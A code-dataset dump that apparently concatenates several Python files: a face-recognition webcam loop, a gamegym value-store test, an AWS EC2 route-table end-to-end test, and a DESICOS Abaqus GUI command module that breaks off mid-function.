biggest_score = np.max(scores)
if biggest_score < proba:
name="unknown"
#scores = scores - np.min(scores)
#scores = scores/np.max(scores)
print(scores,name)
face_names.append(name)
#print(face_names)
for (top, right, bottom, left), name in zip(raw_list, face_names):
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
top *= 5
right *= 5
bottom *= 5
left *= 5
# Draw a box around the faceq
cv2.rectangle(frame, (left-10, top-10), (right+10, bottom+10), (0, 0, 255), 2)
# Draw a label with a name below the face
cv2.rectangle(frame, (left-10, bottom+10), (right+10, bottom+45), (0, 0, 255), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left, bottom + 30), font, 1.0, (255, 255, 255), 1)
cv2.imshow('Video', frame) #display the camra
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.release()
cv2.destroyAllWindows()
faceRecognition()
| 42.225989 | 161 | 0.561012 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,205 | 0.561715 |
d322674711a217f72d8fe05d49c286ff43b55845 | 1,005 | py | Python | tests/contrib/value_learning/_test_valuestore.py | spirali/gamegym | 8c2dbb7969cabae9ca86c0dab74c6ddc5fbd21bf | [
"MIT"
] | 49 | 2018-10-05T20:52:31.000Z | 2021-12-29T05:59:27.000Z | tests/contrib/value_learning/_test_valuestore.py | spirali/gamegym | 8c2dbb7969cabae9ca86c0dab74c6ddc5fbd21bf | [
"MIT"
] | 8 | 2018-10-07T12:11:20.000Z | 2019-02-03T10:47:25.000Z | tests/contrib/value_learning/_test_valuestore.py | spirali/gamegym | 8c2dbb7969cabae9ca86c0dab74c6ddc5fbd21bf | [
"MIT"
] | 4 | 2018-10-07T10:27:43.000Z | 2020-02-13T18:47:37.000Z | from gamegym.game import Game, Situation
from gamegym.utils import get_rng
from gamegym.distribution import Explicit
from gamegym.value_learning.valuestore import LinearValueStore
import numpy as np
import pytest
from scipy.sparse import csr_matrix
def test_init():
LinearValueStore(shape=(3, 3))
LinearValueStore(np.zeros((4, 3)))
LinearValueStore(np.zeros((4, 3)), shape=(4, 3))
with pytest.raises(Exception):
LinearValueStore((3, 3))
with pytest.raises(Exception):
LinearValueStore(np.zeros((4, 3)), shape=(4, 4))
def test_value_update():
a = np.ones((4, ))
vs = LinearValueStore(a)
f = [0, 2, -1, 3]
assert vs.get(f) == pytest.approx(4.0)
assert vs.get(np.array(f)) == pytest.approx(4.0)
#assert vs.get(csr_matrix(f)) == pytest.approx(4.0)
vs.update(f, -0.5)
assert vs.values == pytest.approx([1, 0, 1.5, -0.5])
assert vs.get(f) == pytest.approx(-3.0)
def test_norm():
vs = LinearValueStore(shape=(2, 3), fix_mean=1.0)
| 29.558824 | 62 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 51 | 0.050746 |
d322a549ba04d5714d8f4cb616bd1bf2addd3df6 | 9,951 | py | Python | test/e2e/tests/test_route_table.py | timbyr/ec2-controller | d96d056fdc6ec7d31981f4c14cad8d740f6cf6ec | [
"Apache-2.0"
] | 14 | 2021-08-04T00:21:49.000Z | 2022-03-21T01:06:09.000Z | test/e2e/tests/test_route_table.py | timbyr/ec2-controller | d96d056fdc6ec7d31981f4c14cad8d740f6cf6ec | [
"Apache-2.0"
] | 48 | 2021-08-03T19:00:42.000Z | 2022-03-31T22:18:42.000Z | test/e2e/tests/test_route_table.py | timbyr/ec2-controller | d96d056fdc6ec7d31981f4c14cad8d740f6cf6ec | [
"Apache-2.0"
] | 9 | 2021-07-22T15:49:43.000Z | 2022-03-06T22:24:14.000Z | # Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may
# not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Integration tests for the RouteTable API.
"""
import pytest
import time
import logging
from acktest.resources import random_suffix_name
from acktest.k8s import resource as k8s
from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_ec2_resource
from e2e.replacement_values import REPLACEMENT_VALUES
from e2e.bootstrap_resources import get_bootstrap_resources
# Kubernetes CRD plural used to build the custom-resource reference.
RESOURCE_PLURAL = "routetables"

# Sleep durations (seconds) that give the controller and EC2 time to
# converge after each operation before the test re-checks state.
# NOTE(review): DEFAULT_WAIT_AFTER_SECONDS is not referenced in this chunk;
# confirm it is used elsewhere in the file.
DEFAULT_WAIT_AFTER_SECONDS = 5
CREATE_WAIT_AFTER_SECONDS = 10
DELETE_WAIT_AFTER_SECONDS = 10
def get_route_table(ec2_client, route_table_id: str) -> dict:
    """Describe the route table with the given ID.

    Returns the first matching route-table dict from DescribeRouteTables,
    or None when the describe call fails or no table matches.
    """
    filters = [{"Name": "route-table-id", "Values": [route_table_id]}]
    try:
        response = ec2_client.describe_route_tables(Filters=filters)
    except Exception as error:
        # Best-effort helper: a failed describe is treated as "not found".
        logging.debug(error)
        return None
    route_tables = response["RouteTables"]
    if not route_tables:
        return None
    return route_tables[0]
def route_table_exists(ec2_client, route_table_id: str) -> bool:
    """Return True when a route table with the given ID can be described."""
    route_table = get_route_table(ec2_client, route_table_id)
    return route_table is not None
def get_routes(ec2_client, route_table_id: str) -> list:
    """Return the "Routes" list of the given route table.

    Returns None (not an empty list) when the route table cannot be found
    or the describe call fails, mirroring ``get_route_table``.
    """
    # Reuse get_route_table instead of duplicating the describe/filter/
    # error-handling logic that used to live here.
    table = get_route_table(ec2_client, route_table_id)
    if table is None:
        return None
    return table["Routes"]
def route_exists(ec2_client, route_table_id: str, gateway_id: str, origin: str) -> bool:
    """Return True when the table has a route with this gateway ID and origin.

    Fixes two latent crashes in the original implementation:
    * ``get_routes`` returns None when the table is missing, which made the
      ``for`` loop raise TypeError;
    * routes that target something other than an internet gateway (e.g. a
      NAT gateway) carry no "GatewayId" key, which raised KeyError.
    """
    routes = get_routes(ec2_client, route_table_id)
    if not routes:
        return False
    for route in routes:
        if route.get("Origin") == origin and route.get("GatewayId") == gateway_id:
            return True
    return False
@service_marker
@pytest.mark.canary
class TestRouteTable:
    """End-to-end tests for the RouteTable custom resource.

    Each test drives the resource through the Kubernetes API (via ``k8s``)
    and verifies the resulting state directly in EC2 (via ``ec2_client``).
    """
    def test_create_delete(self, ec2_client):
        """Create a RouteTable CR, check it appears in EC2, delete it, check it is gone."""
        test_resource_values = REPLACEMENT_VALUES.copy()
        resource_name = random_suffix_name("route-table-test", 24)
        test_vpc = get_bootstrap_resources().SharedTestVPC
        vpc_id = test_vpc.vpc_id
        igw_id = test_vpc.public_subnets.route_table.internet_gateway.internet_gateway_id
        test_cidr_block = "192.168.0.0/24"
        test_resource_values["ROUTE_TABLE_NAME"] = resource_name
        test_resource_values["VPC_ID"] = vpc_id
        test_resource_values["IGW_ID"] = igw_id
        test_resource_values["DEST_CIDR_BLOCK"] = test_cidr_block
        # Load Route Table CR
        resource_data = load_ec2_resource(
            "route_table",
            additional_replacements=test_resource_values,
        )
        logging.debug(resource_data)
        # Create k8s resource
        ref = k8s.CustomResourceReference(
            CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,
            resource_name, namespace="default",
        )
        k8s.create_custom_resource(ref, resource_data)
        cr = k8s.wait_resource_consumed_by_controller(ref)
        assert cr is not None
        assert k8s.get_resource_exists(ref)
        # The controller fills status.routeTableID once EC2 created the table.
        resource = k8s.get_resource(ref)
        resource_id = resource["status"]["routeTableID"]
        time.sleep(CREATE_WAIT_AFTER_SECONDS)
        # Check Route Table exists
        assert route_table_exists(ec2_client, resource_id)
        # Delete k8s resource
        _, deleted = k8s.delete_custom_resource(ref)
        assert deleted is True
        time.sleep(DELETE_WAIT_AFTER_SECONDS)
        # Check Route Table doesn't exist
        exists = route_table_exists(ec2_client, resource_id)
        assert not exists
    def test_terminal_condition(self):
        """An invalid VPC ID must surface as an ACK.Terminal condition on the CR."""
        test_resource_values = REPLACEMENT_VALUES.copy()
        resource_name = random_suffix_name("route-table-fail", 24)
        test_resource_values["ROUTE_TABLE_NAME"] = resource_name
        test_resource_values["VPC_ID"] = "InvalidVpcId"
        # Load RouteTable CR
        resource_data = load_ec2_resource(
            "route_table",
            additional_replacements=test_resource_values,
        )
        logging.debug(resource_data)
        # Create k8s resource
        ref = k8s.CustomResourceReference(
            CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,
            resource_name, namespace="default",
        )
        k8s.create_custom_resource(ref, resource_data)
        cr = k8s.wait_resource_consumed_by_controller(ref)
        assert cr is not None
        assert k8s.get_resource_exists(ref)
        expected_msg = "InvalidVpcID.NotFound: The vpc ID 'InvalidVpcId' does not exist"
        terminal_condition = k8s.get_resource_condition(ref, "ACK.Terminal")
        # Example condition message:
        # InvalidVpcID.NotFound: The vpc ID 'InvalidVpcId' does not exist
        # status code: 400, request id: 5801fc80-67cf-465f-8b83-5e02d517d554
        # This check only verifies the error message; the request hash is irrelevant and therefore can be ignored.
        assert expected_msg in terminal_condition['message']
    def test_crud_route(self, ec2_client):
        """Exercise create, update and delete of routes inside a RouteTable CR."""
        test_resource_values = REPLACEMENT_VALUES.copy()
        resource_name = random_suffix_name("route-table-test", 24)
        test_vpc = get_bootstrap_resources().SharedTestVPC
        vpc_id = test_vpc.vpc_id
        igw_id = test_vpc.public_subnets.route_table.internet_gateway.internet_gateway_id
        test_cidr_block = "192.168.0.0/24"
        test_resource_values["ROUTE_TABLE_NAME"] = resource_name
        test_resource_values["VPC_ID"] = vpc_id
        test_resource_values["IGW_ID"] = igw_id
        test_resource_values["DEST_CIDR_BLOCK"] = test_cidr_block
        # Load Route Table CR
        resource_data = load_ec2_resource(
            "route_table",
            additional_replacements=test_resource_values,
        )
        logging.debug(resource_data)
        # Create Route Table
        ref = k8s.CustomResourceReference(
            CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,
            resource_name, namespace="default",
        )
        k8s.create_custom_resource(ref, resource_data)
        cr = k8s.wait_resource_consumed_by_controller(ref)
        assert cr is not None
        assert k8s.get_resource_exists(ref)
        resource = k8s.get_resource(ref)
        resource_id = resource["status"]["routeTableID"]
        time.sleep(CREATE_WAIT_AFTER_SECONDS)
        # Check Route Table exists
        assert route_table_exists(ec2_client, resource_id)
        # Check Routes exist (default and desired)
        # EC2 always adds a "local" route for the VPC CIDR; the CR added one
        # pointing at the internet gateway. Anything else is unexpected.
        routes = get_routes(ec2_client, resource_id)
        for route in routes:
            if route["GatewayId"] == "local":
                default_cidr = route["DestinationCidrBlock"]
                assert route["Origin"] == "CreateRouteTable"
            elif route["GatewayId"] == igw_id:
                assert route["Origin"] == "CreateRoute"
            else:
                assert False
        # Update Route
        updated_cidr = "192.168.1.0/24"
        patch = {"spec": {"routes": [
            {
                #Default route cannot be changed
                "destinationCIDRBlock": default_cidr,
                "gatewayID": "local"
            },
            {
                "destinationCIDRBlock": updated_cidr,
                "gatewayID": igw_id
            }
        ]
        }
        }
        _ = k8s.patch_custom_resource(ref, patch)
        time.sleep(DEFAULT_WAIT_AFTER_SECONDS)
        # assert patched state
        resource = k8s.get_resource(ref)
        assert len(resource['status']['routeStatuses']) == 2
        for route in resource['status']['routeStatuses']:
            if route["gatewayID"] == "local":
                assert route_exists(ec2_client, resource_id, "local", "CreateRouteTable")
            elif route["gatewayID"] == igw_id:
                # origin and state are set server-side
                assert route_exists(ec2_client, resource_id, igw_id, "CreateRoute")
                assert route["state"] == "active"
            else:
                assert False
        # Delete Route
        patch = {"spec": {"routes": [
            {
                "destinationCIDRBlock": default_cidr,
                "gatewayID": "local"
            }
        ]
        }
        }
        _ = k8s.patch_custom_resource(ref, patch)
        time.sleep(DEFAULT_WAIT_AFTER_SECONDS)
        resource = k8s.get_resource(ref)
        assert len(resource['spec']['routes']) == 1
        for route in resource['spec']['routes']:
            if route["gatewayID"] == "local":
                assert route_exists(ec2_client, resource_id, "local", "CreateRouteTable")
            else:
                assert False
        # Should not be able to delete default route
        patch = {"spec": {"routes": [
        ]
        }
        }
        _ = k8s.patch_custom_resource(ref, patch)
        time.sleep(DEFAULT_WAIT_AFTER_SECONDS)
        expected_msg = "InvalidParameterValue: cannot remove local route"
        terminal_condition = k8s.get_resource_condition(ref, "ACK.Terminal")
        assert expected_msg in terminal_condition['message']
        # Delete Route Table
        _, deleted = k8s.delete_custom_resource(ref)
        assert deleted is True
        time.sleep(DELETE_WAIT_AFTER_SECONDS)
        # Check Route Table doesn't exist
        exists = route_table_exists(ec2_client, resource_id)
        assert not exists
d322e920e430d42433aea1129d02e77e626557b0 | 21,922 | py | Python | desicos/abaqus/gui/gui_commands.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 1 | 2020-10-22T22:15:24.000Z | 2020-10-22T22:15:24.000Z | desicos/abaqus/gui/gui_commands.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 1 | 2020-10-09T12:42:02.000Z | 2020-10-09T12:42:02.000Z | desicos/abaqus/gui/gui_commands.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 2 | 2020-07-14T07:45:31.000Z | 2020-12-29T00:22:41.000Z | import os
import subprocess
import shutil
from itertools import chain
import __main__
import numpy as np
import desicos.abaqus.abaqus_functions as abaqus_functions
import desicos.conecylDB as conecylDB
import desicos.abaqus.conecyl as conecyl
import desicos.abaqus.study as study
from desicos.abaqus.constants import TMP_DIR
from desicos.conecylDB import fetch, save
# Names of the ConeCyl attributes that are copied one-to-one from the GUI
# parameters onto each new ConeCyl model (see create_study), and read back
# by reconstruct_params_from_gui. Order is significant and preserved.
ccattrs = [
    'rbot', 'H', 'alphadeg', 'plyts',
    'stack', 'numel_r', 'elem_type',
    'separate_load_steps', 'displ_controlled',
    'axial_displ', 'axial_load', 'axial_step',
    'pressure_load', 'pressure_step',
    #'Nxxtop', 'Nxxtop_vec',
    'damping_factor1', 'minInc1', 'initialInc1', 'maxInc1', 'maxNumInc1',
    'damping_factor2', 'minInc2', 'initialInc2', 'maxInc2', 'maxNumInc2',
    'bc_fix_bottom_uR', 'bc_fix_bottom_v', 'bc_bottom_clamped',
    'bc_fix_bottom_side_uR', 'bc_fix_bottom_side_v', 'bc_fix_bottom_side_u3',
    'bc_fix_top_uR', 'bc_fix_top_v', 'bc_top_clamped',
    'bc_fix_top_side_uR', 'bc_fix_top_side_v', 'bc_fix_top_side_u3',
    'resin_add_BIR', 'resin_add_BOR', 'resin_add_TIR', 'resin_add_TOR',
    'use_DLR_bc',
    'resin_E', 'resin_nu', 'resin_numel',
    'resin_bot_h', 'resin_bir_w1', 'resin_bir_w2', 'resin_bor_w1', 'resin_bor_w2',
    'resin_top_h', 'resin_tir_w1', 'resin_tir_w2', 'resin_tor_w1', 'resin_tor_w2',
    'laminapropKeys', 'allowables', 'timeInterval', 'stress_output',
]
def find_std_name(std_name):
    """Return *std_name*, ensuring ``__main__.stds`` exists first.

    The GUI keeps every loaded study in a dict attached to the ``__main__``
    module; creating it lazily here lets any entry point run first.

    Replaces the previous try/bare-except probe (which also did a pointless
    membership test) with an explicit hasattr check, resolving the old
    "TODO: avoid using try and except" note.
    """
    if not hasattr(__main__, 'stds'):
        __main__.stds = {}
    return std_name
def command_wrapper(cmd):
    """Decorator that prints a full traceback before re-raising.

    GUI command callbacks otherwise tend to hide where a failure happened;
    the exception is still re-raised so callers see it.
    NOTE(review): ``functools.wraps`` is not applied, so the wrapped
    function loses its original ``__name__``/``__doc__`` -- confirm whether
    anything in the GUI relies on those before changing this.
    """
    # Decorator function to provide error tracebacks from commands
    def new_cmd(*args, **kwargs):
        # NOTE(review): cmd's return value is discarded; commands appear to
        # be used for side effects only.
        try:
            cmd(*args, **kwargs)
        except Exception, e:
            import traceback
            traceback.print_exc()
            raise
    return new_cmd
@command_wrapper
def apply_imp_ms(
        std_name,
        imp_ms,
        imp_ms_stretch_H,
        imp_ms_scalings,
        imp_r_TOL,
        imp_ms_ncp,
        imp_ms_power_parameter,
        imp_ms_theta_z_format,
        imp_ms_rotatedeg,
        ):
    """Attach a mid-surface imperfection (MSI) to every model with a
    non-zero scaling factor.

    ``imp_ms_scalings`` holds one single-element row per model; a falsy
    entry means "no imperfection for this model". When ``std.calc_Pcr`` is
    set, the first model in ``std.ccs`` is skipped.
    """
    std = __main__.stds[std_name]
    first_model = 1 if std.calc_Pcr else 0
    # The nodal translations from the first created imperfection are fed
    # into the following ones to avoid repeating the search.
    translations = None
    for offset, row in enumerate(imp_ms_scalings):
        factor = row[0]
        if not factor:
            continue
        cc = std.ccs[offset + first_model]
        msi = cc.impconf.add_msi(
            imp_ms=imp_ms,
            scaling_factor=factor,
            rotatedeg=imp_ms_rotatedeg,
        )
        cc.impconf.rebuild()
        msi.stretch_H = imp_ms_stretch_H
        msi.use_theta_z_format = imp_ms_theta_z_format
        msi.r_TOL = imp_r_TOL
        msi.ncp = imp_ms_ncp
        msi.power_parameter = imp_ms_power_parameter
        msi.nodal_translations = translations
        translations = msi.create()
@command_wrapper
def apply_imp_t(
        std_name,
        imp_thick,
        imp_num_sets,
        imp_t_stretch_H,
        imp_t_scalings,
        imp_t_ncp,
        imp_t_power_parameter,
        imp_t_theta_z_format,
        imp_t_rotatedeg):
    """Attach a thickness imperfection (TI) to every model with a non-zero
    scaling factor.

    ``imp_t_scalings`` holds one single-element row per model; a falsy
    entry means "no imperfection for this model". When ``std.calc_Pcr`` is
    set, the first model in ``std.ccs`` is skipped.
    (``imp_t_rotatedeg`` is accepted for signature symmetry with
    apply_imp_ms but is currently unused.)
    """
    std = __main__.stds[std_name]
    first_model = 1 if std.calc_Pcr else 0
    # The element thicknesses / set mapping found for the first created
    # imperfection are reused for the following ones to save time.
    elems_t = None
    t_set = None
    for offset, row in enumerate(imp_t_scalings):
        factor = row[0]
        if not factor:
            continue
        cc = std.ccs[offset + first_model]
        ti = cc.impconf.add_ti(imp_thick, factor)
        cc.impconf.rebuild()
        ti.number_of_sets = imp_num_sets
        ti.stretch_H = imp_t_stretch_H
        ti.use_theta_z_format = imp_t_theta_z_format
        ti.ncp = imp_t_ncp
        ti.power_parameter = imp_t_power_parameter
        ti.elems_t = elems_t
        ti.t_set = t_set
        elems_t, t_set = ti.create()
def create_study(**kwargs):
    """Build a new Study from the GUI parameters.

    Reads the imperfection tables (perturbation loads, constant buckles,
    dimples, axisymmetric imperfections, linear-buckling mode shapes,
    cutouts, ply-piece and fiber-fraction imperfections) plus laminate,
    load-asymmetry and damping settings from ``kwargs``, determines how
    many models are needed, then creates one ConeCyl per model inside a
    fresh ``study.Study`` registered in ``__main__.stds``.
    """
    # setting defaults
    pl_table = kwargs.get('pl_table')
    cb_table = kwargs.get('cb_table')
    pload_step = kwargs.get('pload_step')
    d_table = kwargs.get('d_table')
    ax_table = kwargs.get('ax_table')
    lbmi_table = kwargs.get('lbmi_table')
    cut_table = kwargs.get('cut_table')
    ppi_enabled = kwargs.get('ppi_enabled')
    ppi_extra_height = kwargs.get('ppi_extra_height')
    ppi_table = kwargs.get('ppi_table')
    ffi_scalings = kwargs.get('ffi_scalings')
    # Drop trailing "empty" FFI rows so they do not inflate num_models.
    while len(ffi_scalings) > 0 and ffi_scalings[-1] in [(0, False), False]:
        ffi_scalings = ffi_scalings[:-1]
    betadeg = kwargs.get('betadeg', 0.)
    omegadeg = kwargs.get('omegadeg', 0.)
    betadegs = kwargs.get('betadegs')
    omegadegs = kwargs.get('omegadegs')
    # imp_num[k]: how many imperfections of each kind per model;
    # imp_tables[k]: the raw GUI table; num_params[k]: number of leading
    # parameter rows in each table before the per-model amplitude rows.
    imp_num = {}
    imp_num['pl'] = kwargs.get('pl_num')
    imp_num['cbi'] = kwargs.get('cb_num')
    imp_num['d'] = kwargs.get('d_num')
    imp_num['ax'] = kwargs.get('ax_num')
    imp_num['lbmi'] = kwargs.get('lbmi_num')
    imp_num['cut'] = kwargs.get('cut_num')
    imp_tables = {}
    imp_tables['pl'] = pl_table
    imp_tables['cbi'] = cb_table
    imp_tables['d'] = d_table
    imp_tables['ax'] = ax_table
    imp_tables['lbmi'] = lbmi_table
    imp_tables['cut'] = cut_table
    num_params = {}
    num_params['pl'] = 2
    num_params['cbi'] = 2
    num_params['d'] = 4
    num_params['ax'] = 2
    num_params['lbmi'] = 1
    num_params['cut'] = 3
    num_models = 1
    for k in ['pl', 'cbi', 'd', 'ax', 'lbmi', 'cut']:
        if imp_num[k] == 0:
            continue
        imp_table = imp_tables[k]
        num_models = max(num_models, len(imp_table)-(num_params[k]+1))
    num_models = max(num_models, len(ffi_scalings))
    #
    # Cleaning up input values
    #
    # laminate
    laminate = np.atleast_2d([i for i in kwargs.get('laminate') if i])
    kwargs['laminate'] = laminate
    kwargs['stack'] = [float(i) for i in laminate[:,2] if i != '']
    stack = kwargs['stack']
    # Empty cells inherit the first ply's lamina property key / thickness.
    kwargs['laminapropKeys'] = [i if i != '' else laminate[0,0]
                                for i in laminate[:len(stack),0]]
    kwargs['plyts'] = [float(i) if i != '' else float(laminate[0,1])
                       for i in laminate[:len(stack),1]]
    #TODO currently only one allowable is allowed for stress analysis
    kwargs['allowables'] = [kwargs['allowables'] for _ in stack]
    #allowablesKeys = [float(i) if i != '' else laminate[0,3] \
    #                  for i in laminate[:len(stack),1]]
    #
    # load asymmetry
    #
    #TODO list comprehension for these guys below
    # la == 0: no load asymmetry; la == 1: one constant value for all
    # models; la == 2: per-model values from the GUI tables.
    la = kwargs.get('la')
    if la == 0:
        betadegs = []
        omegadegs = []
    elif la == 1:
        betadegs = [betadeg for i in range(num_models)]
        omegadegs = [omegadeg for i in range(num_models)]
    elif la == 2:
        if betadegs is not None:
            new_betadegs = []
            for betadeg in betadegs:
                if betadeg:
                    new_betadegs.append(betadeg[0])
            betadegs = new_betadegs
        else:
            betadegs = []
        if omegadegs is not None:
            new_omegadegs = []
            for omegadeg in omegadegs:
                if omegadeg:
                    new_omegadegs.append(omegadeg[0])
            omegadegs = new_omegadegs
        else:
            omegadegs = []
        num_models = max(num_models, len(betadegs), len(omegadegs))
    #
    # damping
    #
    # A damping factor of None means "artificial damping disabled".
    if not kwargs['artificial_damping1']:
        kwargs['damping_factor1'] = None
    if not kwargs['artificial_damping2']:
        kwargs['damping_factor2'] = None
    #
    std_name = find_std_name(kwargs.get('std_name'))
    #
    dirname = os.path.join(TMP_DIR, std_name, 'outputs')
    if not os.path.isdir(dirname):
        os.makedirs(dirname)
    #
    #
    std = study.Study()
    __main__.stds[std_name] = std
    std.name = std_name
    std.rebuild()
    for cc in std.ccs:
        cc.rebuilt = False
        cc.created_model = False
    # One ConeCyl per model; i is 1-based so that (i + num_params[k]) is
    # the row of table k holding this model's amplitudes.
    for i in range(1, num_models+1):
        cc = conecyl.ConeCyl()
        for attr in ccattrs:
            setattr(cc, attr, kwargs[attr])
        # adding load asymmetry
        i_model = i-1
        if i_model < len(betadegs):
            cc.betadeg = betadegs[i_model]
        if i_model < len(omegadegs):
            cc.omegadeg = omegadegs[i_model]
        # adding perturbation loads
        i_model = i + num_params['pl']
        if i_model < len(pl_table):
            for j in range(imp_num['pl']):
                theta = pl_table[0][j]
                pt = pl_table[1][j]
                pltotal = pl_table[i_model][j]
                cc.impconf.add_pload(theta, pt, pltotal, step=pload_step)
        #Adding constant buckle
        i_model = i + num_params['cbi']
        if i_model < len(cb_table):
            for j in range(imp_num['cbi']):
                theta = cb_table[0][j]
                pt = cb_table[1][j]
                cbtotal = cb_table[i_model][j]
                cc.impconf.add_cb(theta, pt, cbtotal, step=pload_step)
        # adding single buckles
        i_model = i + num_params['d']
        if i_model < len(d_table):
            for j in range(imp_num['d']):
                theta0 = d_table[0][j]
                z0 = d_table[1][j]
                a = d_table[2][j]
                b = d_table[3][j]
                wb = d_table[i_model][j]
                cc.impconf.add_dimple(theta0, z0, a, b, wb)
        # adding axisymmetrics
        i_model = i + num_params['ax']
        if i_model < len(ax_table):
            for j in range(imp_num['ax']):
                z0 = ax_table[0][j]
                b = ax_table[1][j]
                wb = ax_table[i_model][j]
                cc.impconf.add_axisymmetric(z0, b, wb)
        # adding linear buckling mode-shaped imperfections
        i_model = i + num_params['lbmi']
        if i_model < len(lbmi_table):
            for j in range(imp_num['lbmi']):
                mode = lbmi_table[0][j]
                scaling_factor = lbmi_table[i_model][j]
                cc.impconf.add_lbmi(mode, scaling_factor)
        # adding cutouts
        i_model = i + num_params['cut']
        if i_model < len(cut_table):
            for j in range(imp_num['cut']):
                theta = cut_table[0][j]
                pt = cut_table[1][j]
                numel = cut_table[2][j]
                d = cut_table[i_model][j]
                cutout = cc.impconf.add_cutout(theta, pt, d,
                        numel_radial_edge=numel)
        ## adding ply piece imperfection
        if ppi_enabled:
            info = []
            for row in ppi_table:
                if row is False:
                    continue # False may be appended if there is only one row
                keys = ['starting_position', 'rel_ang_offset', 'max_width', 'eccentricity']
                # NOTE: the generator expression below has its own scope, so
                # its loop variable i does not clobber the model index i.
                try:
                    info.append(dict((key, float(row[i])) for i, key in enumerate(keys) if row[i] != ''))
                except ValueError, e:
                    raise ValueError('Invalid non-numeric value in Ply Piece Imperfection table:' + e.message.split(':')[-1])
            cc.impconf.add_ppi(info, ppi_extra_height)
        # adding fiber fraction imperfection
        i_model = i-1
        if i_model < len(ffi_scalings):
            global_sf, use_ti = ffi_scalings[i_model]
            if global_sf == 0:
                global_sf = None
            if use_ti or (global_sf is not None):
                cc.impconf.add_ffi(nominal_vf=kwargs['ffi_nominal_vf'],
                                   E_matrix=kwargs['ffi_E_matrix'],
                                   nu_matrix=kwargs['ffi_nu_matrix'],
                                   use_ti=use_ti,
                                   global_sf=global_sf)
        std.add_cc(cc)
    std.create_models(write_input_files=False)
def run_study(std_name, ncpus, use_job_stopper):
    """Spawn ``abaqus python run_<std_name>.py ...`` as a background process.

    Parameters
    ----------
    std_name : str
        Study name; also the sub-directory of TMP_DIR containing the
        generated run script.
    ncpus : int
        Passed to the runner as ``cpus=<n>``.
    use_job_stopper : bool
        When True, appends the ``use_stopper`` flag to the command line.
    """
    script = os.path.join(TMP_DIR, std_name, 'run_' + std_name + '.py')
    cmd_parts = ['abaqus', 'python', script, 'cpus={0:d}'.format(ncpus), 'gui']
    if use_job_stopper:
        cmd_parts.append('use_stopper')
    # NOTE(review): shell=True with a space-joined command line breaks if
    # the script path contains spaces -- confirm whether TMP_DIR can.
    subprocess.Popen(' '.join(cmd_parts), shell=True)
def clean_output_folder(std_name):
    """Empty the study's output directory while preserving ``*.gaps`` files.

    The ``*.gaps`` files are moved to the parent directory before wiping
    the folder and moved back afterwards.

    Parameters
    ----------
    std_name : str
        Key of the study in ``__main__.stds``; when the study does not
        exist a message is printed and nothing happens.
    """
    stds = __main__.stds
    if std_name not in stds:
        print('Study has not been created!')
        print('')
        return
    std = stds[std_name]
    cwd = os.getcwd()
    os.chdir(std.output_dir)
    try:
        if os.name == 'nt':
            os.system('move *.gaps ..')
            os.system('del /q *.*')
            os.system('move ..\*.gaps .')
        else:
            os.system('mv *.gaps ..')
            os.system('rm *.*')
            # BUG fix: the POSIX branch used the Windows-style path
            # '..\*.gaps', so the .gaps files were never moved back.
            os.system('mv ../*.gaps .')
    except Exception:
        # Best-effort cleanup -- shell failures are ignored, as before.
        pass
    finally:
        # Always restore the original working directory.
        os.chdir(cwd)
def save_study(std_name, params_from_gui):
    """Persist the study object and save the Abaqus CAE database to TMP_DIR.

    ``params_from_gui`` is stored on the study so the GUI form can be
    repopulated by load_study_gui later. Prints a message and returns when
    the study has not been created yet.
    """
    stds = __main__.stds
    if std_name not in stds:
        print('Study has not been created!')
        print(' ')
        return
    std = stds[std_name]
    std.params_from_gui = params_from_gui
    std.save()
    if not os.path.isdir(TMP_DIR):
        os.makedirs(TMP_DIR)
    os.chdir(TMP_DIR)
    __main__.mdb.saveAs(pathName=std_name + '.cae')
    saved_path = os.path.join(std.tmp_dir, std_name)
    print(r'The DESICOS study has been saved to "{0}.study".'.format(saved_path))
    print(' ')
def load_study(std_name):
    """Load a saved study from TMP_DIR and restore the Abaqus session state.

    Opens the matching ``.cae`` database, displays the 'Shell' part of the
    first model (when present) and re-applies the TI colors (via
    ``abaqus_functions.set_colors_ti``) to every loaded model.
    """
    loader = study.Study()
    loader.tmp_dir = TMP_DIR
    loader.name = std_name
    std = loader.load()
    std_name = find_std_name(std_name)
    __main__.stds[std_name] = std
    __main__.openMdb(pathName=std_name + '.cae')
    viewport_name = __main__.session.currentViewportName
    viewport = __main__.session.viewports[viewport_name]
    viewport.setValues(displayedObject=None)
    mdb = __main__.mdb
    first_model_name = std.ccs[0].model_name
    if first_model_name in mdb.models.keys():
        mod = mdb.models[first_model_name]
        viewport.setValues(displayedObject=mod.parts['Shell'])
        mod.rootAssembly.regenerate()
    for cc in std.ccs:
        if cc.model_name not in mdb.models.keys():
            print('Could not load objects for model {0}!'.format(
                cc.model_name))
            continue
        abaqus_functions.set_colors_ti(cc)
def get_new_key(which, key, value):
    """Return a DB key under which *value* can be referenced.

    Checks whether *value* already exists in database *which*; when it does
    not, a fresh key (derived from *key*) is created and the value saved.
    """
    value = tuple(value)  # Convert list to tuple, if needed
    existing = fetch(which)
    # The key is reusable only when it already maps to exactly this value.
    if existing.get(key) == value:
        return key
    # Inverse mapping; iterating the sorted pairs in reverse keeps the
    # surviving key deterministic when several keys share one value.
    by_value = {}
    for existing_key, existing_value in sorted(existing.iteritems(), reverse=True):
        by_value[existing_value] = existing_key
    if value in by_value:
